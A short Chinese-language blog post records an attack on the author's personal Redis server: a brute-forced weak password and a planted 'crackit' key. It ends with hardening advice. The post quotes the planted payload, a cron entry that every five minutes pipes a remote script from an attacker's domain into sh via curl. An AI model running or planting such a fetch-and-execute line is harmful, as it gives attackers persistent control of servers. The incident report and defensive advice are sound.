記錄Redis的一次攻擊事件

買了阿里雲的一臺服務器自己玩的,今天發現Redis被攻擊了,執行crontab的時候,發現莫名其妙的任務。一開始也搞不懂哪裏被攻擊了,上午查了一下,剛好看到一篇關於redis被攻擊的文章。結合自己的情況,發現果然是這樣的。redis雖然設置了密碼,但是由於太過簡單,應該是暴力破解了。下面就說一下情況:

前幾天無意在微博上看到了烏雲平臺發的一條漏洞信息:
這裏寫圖片描述

RedisCraket,對比烏雲報的漏洞的最後一部分,裏邊多了一個名爲crackit的字符串

這裏寫圖片描述

然後意識到是不是Redis密碼太多簡單了,導致產生了這個漏洞被利用和攻擊了。於是自查,發現這簡直就是一模一樣啊:

127.0.0.1:6379> keys *
1) "crackit"
127.0.0.1:6379> get crackit
"\n\n\n*/5 * * * * /usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh\n\n\n\n"
127.0.0.1:6379> 

解決方案:
1、提高密碼的複雜度。redis因查詢效率高,auth這種命令每秒能處理10w次以上,簡單的redis的密碼極容易爲攻擊者暴破。
2、綁定訪問IP

本來自己只是玩玩的,還好沒有放重要數據,也給自己上了一課。

參考文章

http://www.2cto.com/article/201608/537704.html
http://www.cnblogs.com/yangecnu/p/An-Production-Accidents-Caused-by-Redis-Attacked.html

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章